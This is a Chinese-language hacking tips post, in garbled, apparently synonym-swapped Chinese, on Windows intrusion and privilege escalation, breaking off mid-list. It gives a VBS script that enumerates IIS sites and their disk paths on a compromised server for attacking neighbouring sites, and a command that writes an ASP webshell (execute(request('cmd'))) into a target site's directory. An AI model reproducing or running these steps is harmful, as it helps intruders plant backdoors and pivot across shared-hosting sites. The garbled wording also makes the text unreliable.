本文汇总了Windows渗入与提权的多个技能,包含:MSSQL查询阐发器连接记实断根、VNC与Radmin的提权编制、Cmd 下目次的把持技能和Webshell 提权小技能等。
旁站路径标题问题:
1、读网站建设。
2、用以下VBS:
On Error Resume Next
If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then
MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"
WScript.Quit
End If
Set objservice = GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
Set OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
If Err <> 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & "[" & OService.ServerComment & "]"
For Each Binds In OService.ServerBindings
Web = "{ " & Replace(Binds, ":", " } { ") & " }"
WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "")
Next
WScript.Echo "Path : " & VDirObj.Path
End If
Next
3、iis_spy 列举(注:需要撑持ASPX,反IISSPY的编制:将 activeds.dll,activeds.tlb 降权)。
4、获得方针站目次,不克不及直接跨的。可以经由过程“echo ^<%execute(request(“cmd”))%^> >>X:\方针目次\X.asp”或“copy 脚本文件 X:\方针目次\X.asp”像方针目次写进webshell,或还可以尝尝type号令。
网站可能目次(注:通常为虚拟主机类):